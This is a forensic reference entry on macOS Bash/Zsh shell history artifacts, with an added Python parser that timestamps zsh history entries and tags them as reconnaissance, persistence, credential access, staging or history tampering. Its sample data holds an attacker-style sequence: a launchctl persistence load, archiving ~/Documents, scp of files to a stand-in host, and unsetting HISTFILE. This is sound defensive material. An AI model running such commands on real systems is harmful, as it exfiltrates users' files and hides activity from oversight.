Bash / Zsh Shell History
Location
~/.zsh_history (default since macOS Catalina), ~/.bash_history, ~/.zsh_sessions/
Description
Per-user shell command history files recording commands entered in interactive terminal sessions. Since macOS Catalina, Zsh is the default shell and history is stored in ~/.zsh_history. The ~/.zsh_sessions/ directory contains per-session history files with additional metadata. Extended history format includes timestamps for each command.
Forensic Value
Shell history provides direct evidence of commands executed by the attacker or compromised user, including reconnaissance (whoami, sw_vers, ifconfig), persistence installation (launchctl load), credential access (security find-generic-password), and data staging (tar, zip, curl, scp). The Zsh sessions directory preserves per-session command history even when the main history file is cleared. Sophisticated attackers unset HISTFILE or clear history, but partially written session files and Unified Log entries may preserve command evidence. Always check all user accounts, including root.
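Added example (not part of the original reference): a triage parser for the extended history format that recovers per-command UTC timestamps and tags entries with the categories listed above. The function names, the history_tampering tag and the sample data are assumptions made for illustration; the byte unescaping reflects how zsh writes certain bytes to its history file.

```python
import re
from datetime import datetime, timezone

# zsh extended history entry: ": <start epoch>:<elapsed seconds>;<command>"
ENTRY = re.compile(rb": (\d+):(\d+);(.*)", re.S)
# Command names per category come from the artifact description above.
CATEGORIES = {
    "reconnaissance": {"whoami", "sw_vers", "ifconfig"},
    "persistence": {"launchctl"},
    "credential_access": {"security"},
    "data_staging": {"tar", "zip", "curl", "scp"},
}

def unmetafy(raw: bytes) -> bytes:  # zsh stores some bytes as 0x83, (byte ^ 0x20)
    out, it = bytearray(), iter(raw)
    for b in it:
        out.append(next(it, 0x20) ^ 0x20 if b == 0x83 else b)
    return bytes(out)

def parse_history(raw: bytes):
    """Return (utc_timestamp_or_None, command) for every entry."""
    entries, pending = [], b""
    for line in unmetafy(raw).split(b"\n") + [b""]:  # sentinel flushes a cut-off tail
        if line.endswith(b"\\"):          # multi-line command continues
            pending += line[:-1] + b"\n"
            continue
        record, pending = pending + line, b""
        if record:
            m = ENTRY.fullmatch(record)   # no match: plain line without timestamp
            ts = datetime.fromtimestamp(int(m[1]), timezone.utc) if m else None
            entries.append((ts, (m[3] if m else record).decode("utf-8", "replace")))
    return entries

def flag(cmd: str):
    """Categories whose commands start a ;, |, & or newline separated segment."""
    heads = set()
    for seg in re.split(r"[|;&\n]+", cmd):
        toks = [t for t in seg.split() if t != "sudo"]
        heads.update(t.rsplit("/", 1)[-1] for t in toks[:1])
    hits = [c for c, names in CATEGORIES.items() if heads & names]
    return hits + (["history_tampering"] if "HISTFILE" in cmd else [])

# Constructed sample, not taken from a real system.
SAMPLE = (b": 1700000000:0;whoami\n"
          b": 1700000005:0;sudo launchctl load /Library/LaunchDaemons/com.example.agent.plist\n"
          b": 1700000060:2;tar czf /tmp/\xc3\x83\xa9tat.tgz ~/Documents\n"
          b": 1700000090:1;for f in a b; do\\\nscp $f user@host.example:/tmp; done\n"
          b": 1700000100:0;unset HISTFILE\n"
          b"sw_vers\n")
```

Read evidence files in binary mode from a forensic copy and pass the bytes to parse_history(); entries with a None timestamp come from lines that lack the extended-history prefix.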